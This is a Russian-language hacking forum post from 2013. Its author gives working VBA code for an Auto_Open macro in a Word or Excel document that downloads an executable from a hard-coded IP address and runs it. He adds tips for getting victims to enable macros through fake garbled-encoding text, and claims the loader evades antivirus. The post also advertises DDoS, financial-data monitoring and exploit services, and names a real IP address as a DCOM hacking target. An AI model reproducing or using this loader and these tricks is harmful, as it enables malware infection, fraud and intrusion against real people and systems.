Всем привет! Давно не писал статей на нашем форуме, но скажу сразу что захожу на форум частенько и пытаюсь просмотреть все темы и замечаю что мало кто проявляет себя либо стесняются люди либо боятся может.
И так начну с интересного и закончу интересным))))
И так мои темы: делаем лодер из ворд документа, скажу сразу закончить не смог до конца проект не охота была возится с сертификатами и так вот видео чтоб вы поняли о чем речь

И так устанавливаем ворд, у меня стоит 2010, создаем документ ворд или ексель открываем и идем в разработчик далее создаем макрос Auto_Open далее нажимаем Alt-F11 и вбиваем следующий код

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub Auto_Open()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "http://195.242.218.159/paload.exe"
        LocalFile = "C:\Users\Public\miton.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\miton.exe", vbNormalFocus
       
        End Sub

Тут я думаю все понятно но есть пару ньюансов нужно ложить фаил на дед с поднятым хостингом либо ftp ну или сами смотрите пробуйте у меня почемуто с хостинга качать не хотел
и второй ньюанс как вы могли заметить фаил качается в публичную папку а такаой папки в xp нет можно даписать код а так на виндовс7 робит норм + фуд и фаерфол не блочит
Минус в том что при открытие документа если не включены макросы спрашивает включить нет но можно зделать типа такова ???????????????????????????   ?????????  ??????
???????    ??????????  ??????????????? ????????? и чел в 90% случаев нажмет думая что это проблемы с кадировкой .

хотел написать про эксплоиты под java но подумал что придется потратить полдня и передумал)))))
Если кому будет интересно пишите в личку дам пару уроков как зделать эксплоиты даже без знания языков программирования.
В следующий раз обязательно постраюсь еще скинуть интересные темы.
Если есть кто обладает знаниями в программировании или хочет выступить спонсором с интересных проектах пишите буду рад пообшаться.
Открытые проекты Doss через днс резольверы сила атаки более 100 M/s
Мониторинг смс, яндекс деньги,вебмани, кредитные карты
Приватные проекты только спонсорам.

Занимаюсь сложными проектами узкой тематикой,лично нашел 3 узвимости в винде 7 (проблема с рускими сиртификатоми)
остальные проекты невыкладываю это полный приват))))
написание эксплоитов,самые интересные и дерзкие идеи, если вы считаете себя таким пишите.
Всем удачи!!!!


Кстати одно из условий привата нашего это взлом через DCOM уязвимость даю вам ip  чтоб вы могли проанализировать и дальше уже выполнить данное условие вот ip  сданой уязвимостью 82.117.42.138 надеюсь этим я вам чем то помог.

Отредактировано nitob (2013-07-02 09:22:41)